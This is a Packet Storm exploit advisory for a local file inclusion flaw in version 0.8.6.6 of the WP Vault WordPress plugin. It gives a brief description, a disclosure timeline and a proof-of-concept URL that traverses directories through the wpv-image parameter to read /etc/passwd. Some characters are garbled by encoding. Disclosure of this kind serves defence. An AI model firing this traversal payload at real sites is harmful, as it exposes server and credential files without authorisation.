WordPress WP Vault 0.8.6.6 Local File Inclusion

2016-12-01T00:00:00
ID PACKETSTORM:139979
Type packetstorm
Reporter Lenon Leite
Modified 2016-12-01T00:00:00

Description

                                        
                                            `# Exploit Title: WP Vault 0.8.6.6 a Plugin WordPress a Local File Inclusion  
# Date: 28/11/2016  
# Exploit Author: Lenon Leite  
# Vendor Homepage: https://wordpress.org/plugins/wp-vault/  
# Software Link: https://wordpress.org/plugins/wp-vault/  
# Contact: http://twitter.com/lenonleite  
# Website: http://lenonleite.com.br/  
# Category: webapps  
# Version: 0.8.6.6  
# Tested on: Ubuntu 14.04  
  
1 - Description:  
  
$_GET[awpv-imagea] is not escaped in include file.  
  
http://lenonleite.com.br/en/blog/2016/11/30/wp-vault-0-8-6-6-local-file-inclusion/  
  
  
2 - Proof of Concept:  
  
http://Target/?wpv-image=[LFI]  
  
http://Target/?wpv-image=../../../../../../../../../../etc/passwd  
  
3 - Timeline:  
  
12/11/2016 - Discovered  
12/11/2016 - vendor not found  
  
`